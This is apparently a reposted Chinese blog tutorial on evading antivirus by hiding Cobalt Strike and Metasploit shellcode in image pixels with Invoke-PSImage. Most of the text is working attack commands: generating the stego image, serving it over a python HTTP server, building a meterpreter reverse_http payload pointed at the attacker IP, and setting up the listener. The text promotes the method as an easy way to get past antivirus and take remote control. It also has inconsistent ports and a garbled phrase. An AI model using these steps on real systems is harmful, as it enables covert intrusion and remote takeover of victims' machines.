本文共 1607 字,大约阅读时间需要 5 分钟。
最近跟一个朋友一起开发一个站点时,发现站点开了很多杀软,包括各种CSPowershell马和反调试工具,使用传统的CS反调试方法无法成功上线。后来在GitHub上找到了一种将Shellcode隐藏到图片RGB像素的方法,并成功将其上线到CS平台。这个免杀方法效果非常好,且实现相对简单。今天将详细记录这个免杀过程。
靶机:Win7
IP:192.168.82.136 攻击机:FSEC IP:192.168.82.134生成PowerShell脚本
首先,在CS上生成一个PowerShell脚本文件。可以使用以下命令:Set-ExecutionPolicy Unrestricted -Scope CurrentUserImport-Module .\Invoke-PSImage.ps1Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web
生成带有Shellcode的图片
执行上述命令后,会生成一张名为shell.png的图片文件。这个图片文件的每个像素都被修改为特定的RGB值,隐藏了Shellcode。 架设HTTP服务器
使用Python架设一个简单的HTTP服务器,用于提供隐藏Shellcode的图片。命令如下:python3 -m http.server 80
在靶机上运行PowerShell
将生成的shell.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134/shell.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行相应的攻击代码。 生成PowerShell反向HTTP支付拉伸(RAT)
使用Metasploit Framework(MSF)生成一个RATPayload:msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1
将Shellcode隐藏到图片中
将生成的msf.ps1文件与Invoke-PSImage.ps1文件放在同一目录,按照CS平台步骤生成一个带有Shellcode的图片(如msf.png)。 在MSF中设置反向监听
在攻击机上使用MSF设置一个反向HTTP监听:msf6 > use exploit/multi/handlermsf6 > set payload windows/x64/meterpreter/reverse_httpmsf6 > set lhost 192.168.82.134msf6 > set lport 7799msf6 > exploit
在靶机上运行PowerShell
将生成的msf.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134:7799/msf.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行远程攻击。 这种将Shellcode隐藏到图片RGB像素的免杀方法非常实用,既能绕过杀软检测,又能轻松实现远程控制。无论是CS平台还是Metasploit平台,都可以通过简单的命令完成整个流程。对于对技术感兴趣的朋友来说,这是一个非常值得尝试的方法。
本文仅用于技术交流和学习,严禁将介绍的方法用于非法操作。如果您对他人造成损失,请自行承担后果。如果您无法接受上述约定,请不要阅读本文。
转载地址:http://reakz.baihongyu.com/